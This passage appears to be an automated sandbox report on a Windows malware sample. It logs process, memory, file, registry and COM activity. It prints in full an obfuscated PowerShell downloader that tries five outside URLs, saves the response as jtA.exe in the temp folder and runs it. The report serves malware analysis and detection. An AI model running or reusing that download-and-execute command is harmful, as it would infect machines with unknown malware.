| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.Statu |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.Status |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.Status |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.Status - |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.Status -e |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.Status -eq |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.Status -eq |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.Status -eq 2 |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.Status -eq 20 |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.Status -eq 200 |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = qJP, value = !qJP!p |
|
1 | |
| Set Environment String | name = qJP, value = !qJP!po |
|
1 | |
| Set Environment String | name = qJP, value = !qJP!pow |
|
1 | |
| Set Environment String | name = qJP, value = !qJP!powe |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #4: powershell.exe
139
6
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.Status -eq 200) {$Rvi.open();$Rvi.type = 1;$Rvi.write($sfF.responseBody);$Rvi.savetofile($Xil);Start-Process $Xil;break}}catch{}} |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:24, Reason: Child Process |
| Unmonitor | End Time: 00:01:53, Reason: Self Terminated |
| Monitor Duration | 00:00:29 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb08 |
| Parent PID | 0xa9c (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B0C
0x
B10
0x
B14
0x
B18
0x
B20
0x
B34
0x
B38
0x
B48
0x
B4C
0x
B50
0x
B54
0x
B58
0x
B5C
0x
B60
0x
BC4
0x
BD4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x00070000 | 0x00072fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00270000 | 0x002d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x003e0000 | 0x003e3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x00597fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x00720fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x01b2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001b30000 | 0x01b30000 | 0x01c2ffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x01c30000 | 0x01c4ffff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x01c50000 | 0x01c7ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01c8ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x01c90000 | 0x01c93fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001ca0000 | 0x01ca0000 | 0x01ca0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001cb0000 | 0x01cb0000 | 0x01cb2fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001cc0000 | 0x01cc0000 | 0x01cc0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001cd0000 | 0x01cd0000 | 0x01cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01d5ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01d60000 | 0x01dc5fff | Memory Mapped File | r |
|
|
|
- |
| l_intl.nls | 0x01dd0000 | 0x01dd2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001de0000 | 0x01de0000 | 0x01e5ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000001e60000 | 0x01e60000 | 0x01f3efff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f40000 | 0x0220efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002210000 | 0x02210000 | 0x02210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002220000 | 0x02220000 | 0x0229ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000022a0000 | 0x022a0000 | 0x02692fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000026a0000 | 0x026a0000 | 0x026bffff | Private Memory | - |
|
|
|
- |
| sorttbls.nlp | 0x026c0000 | 0x026c4fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x026d0000 | 0x026d7fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000026e0000 | 0x026e0000 | 0x026e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000026f0000 | 0x026f0000 | 0x026fffff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x02700000 | 0x02740fff | Memory Mapped File | r |
|
|
|
- |
| system.transactions.dll | 0x02750000 | 0x02795fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002750000 | 0x02750000 | 0x02750fff | Pagefile Backed Memory | r |
|
|
|
- |
| mscorrc.dll | 0x02750000 | 0x027a3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000027b0000 | 0x027b0000 | 0x0282ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x0292ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002940000 | 0x02940000 | 0x029bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029c0000 | 0x029c0000 | 0x02a3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a60000 | 0x02a60000 | 0x02adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ae0000 | 0x02ae0000 | 0x02be0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c20000 | 0x02c20000 | 0x02c9ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002ca0000 | 0x02ca0000 | 0x1ac9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001aca0000 | 0x1aca0000 | 0x1b36ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b3b0000 | 0x1b3b0000 | 0x1b42ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x1b430000 | 0x1b711fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll.mui | 0x1b720000 | 0x1b7dffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x000000001b7e0000 | 0x1b7e0000 | 0x1b8dffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x756a0000 | 0x75768fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| powershell.exe | 0x13f570000 | 0x13f5e6fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fede8f0000 | 0x7fedea84fff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7fedec00000 | 0x7fedf2a4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fedf2b0000 | 0x7fedf2edfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fedf2f0000 | 0x7fedf407fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fedf410000 | 0x7fedf625fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7fedf630000 | 0x7fedf714fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fedf720000 | 0x7fedf7c9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fedf7d0000 | 0x7fedf801fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fedf810000 | 0x7fedf878fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7fedf880000 | 0x7fedfbadfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fedfbb0000 | 0x7fee070cfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee0710000 | 0x7fee07c1fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fee07d0000 | 0x7fee11f2fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee1200000 | 0x7fee20dbfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fee2170000 | 0x7fee2b0cfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee6260000 | 0x7fee62f8fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fee6300000 | 0x7fee636efff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x7fef8e40000 | 0x7fef8e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x7fef8e50000 | 0x7fef8e83fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x7fef9b40000 | 0x7fef9bbffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7fef9bc0000 | 0x7fef9bcefff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefb340000 | 0x7fefb396fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefb730000 | 0x7fefb73afff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb760000 | 0x7fefb778fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefc510000 | 0x7fefc63bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefcf30000 | 0x7fefcf4dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd980000 | 0x7fefd9a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff0004ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00050000 | 0x7ff00050000 | 0x7ff0005ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00060000 | 0x7ff00060000 | 0x7ff000fffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00100000 | 0x7ff00100000 | 0x7ff0010ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00110000 | 0x7ff00110000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00180000 | 0x7ff00180000 | 0x7ff0018ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00190000 | 0x7ff00190000 | 0x7ff0019ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff00000 | 0x7fffff00000 | 0x7fffff0ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff9ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 101 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aETAdzjz\AppData\Local\Temp\jtA.exe | 132.00 KB |
MD5:
912807d798d35323a534fdb59399a9b0
SHA1: 2060d9f147311fdeec4de5f5d940b7a6f849846d SHA256: 78ccba1d9e5d32658ce4cd4b2f8a8be65c6aa6a4f4eec2016777afb3a50ac843 SSDeep: 3072:ePsv/P6gmhkFDDQKSZ4k5AF6xIsawMlkgu866:S9QD+zyF6xIsaFXP |
|
|
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | msxml2.xmlhttp | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | adodb.stream | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | msxml2.xmlhttp | IDispatch | method_name = Open |
|
1 |
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\\jtA.exe | - |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\jtA.exe | type = file_attributes |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\\jtA.exe | - |
|
1 |
Registry (19)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Read Value | - | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\jtA.exe | show_window = SW_SHOWNORMAL |
|
1 | |
| Get Info | - | type = PROCESS_BASIC_INFORMATION |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 |
User (1)
